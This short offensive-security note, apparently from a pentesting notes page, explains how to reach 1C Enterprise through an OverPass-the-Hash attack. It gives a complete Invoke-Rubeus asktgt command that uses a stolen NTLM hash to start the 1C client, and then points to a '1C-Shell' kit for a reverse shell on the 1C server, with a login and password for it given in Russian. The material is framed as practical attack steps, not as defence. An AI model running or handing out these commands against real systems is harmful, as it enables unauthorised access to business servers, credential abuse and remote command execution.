To gain access to 1C Enterprise, you need a username and password. In case 1C works with LDAP authentication and you only have the user's NTLM hash, you can use Rubeus to launch 1C using the OverPass-the-Hash attack. Thus, you can access 1C Enterprise without having a password in the plaintext.
Invoke-Rubeus -Command "asktgt /user:i.ivanov /domain:APTNOTES.LOCAL /rc4:A87F3A337D73085C45F9416BE5787D86 /createnetonly:C:\\1cestart.exe /show"
Bonus:
If the compromised user has permissions to run "External data processors", you can get a reverse shell of the 1C server.
https://github.com/KraudSecurity/1C-Exploit-Kit/tree/master/1C-Shell
Конфигурация 1C-Shell для платформы 1С:Предприятие 8, которая позволяет выполнять команды на сервере 1С в контексте пользователя USR1CV8, от имени которого работает сервер 1С.
Логин: Kraud
Пароль: MArS6M